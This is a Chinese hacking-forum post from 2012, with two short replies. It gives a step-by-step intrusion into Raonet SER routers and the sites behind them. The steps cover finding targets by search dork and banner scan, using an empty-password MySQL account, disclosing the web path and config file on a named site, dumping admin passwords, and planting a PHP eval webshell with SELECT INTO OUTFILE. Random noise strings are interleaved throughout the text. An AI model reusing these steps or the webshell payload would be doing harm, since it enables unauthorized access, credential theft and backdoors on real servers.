找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2648|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:6 o) j9 P' l! q  m) E1 r/ h; Q

6 ~# B) D" a3 W8 u1 i# \: s1:google搜索'Raonet Subscriber Ethernet Router'+ R, R0 P. C' \- j# q$ w
# C; N6 I9 Q* X0 Z
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001. C7 t5 v  y! M4 w7 `- @8 M& q
2 {& p, z" @! j- ?. E
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
! ]. R! b) \( F# D8 t9 F/ @8 U9 V" N
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
, o- q0 o! ~$ V9 H8 c# m( b0 |  [
* m) c4 F0 e2 Y9 n- h3 ^" ] $ X2 u0 e( F' q4 _( N

( H& h! z& q' N' c* C0 q入侵步骤:. u  Y& N, t, ?/ E6 N

3 q' X3 I$ g, ]  _1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
0 j8 U! E( o+ R1 T$ b$ P  B* R+ D3 L* a( e
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
" L1 P" Z0 @+ e' W( ^, `8 B" Y( K3:得到密码后连接,查看GUI管理密码:+ a+ j% i" k8 q! N( H! y* }" b9 G
use ser_500
6 \( I8 w) {0 _3 t' J0 I( S% Kselect id,passwd from user;4 \, Z9 V5 S1 E- W1 a
4:通过数据库写入webshell,执行命令:% Z7 w3 h$ S# p$ S5 r: p: B
use mysql;' E& i- N$ o$ E
create table ok(cmd TEXT);  L0 }# d0 g3 v( u# {5 Q, m
insert into ok values("<?php @eval($_POST[cmd])?>");
3 [5 O$ h7 p' [+ R6 x3 `  c; Cselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
& |. j0 i& Z( `! U5 `drop table ok;: n/ K( |& N1 {" Z) m; O9 L. X( r/ [/ I

& [8 G2 D7 R0 V. S5:连接后门shell.php , J6 E; i: A3 I2 t. ]& y6 d# b. k
0 E  k. H( L* E, n; v. a
6. 搞定!# [+ r" U# r, N9 L( {5 }' @
4 K8 t& \3 b6 K6 O1 {* r" [9 S
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表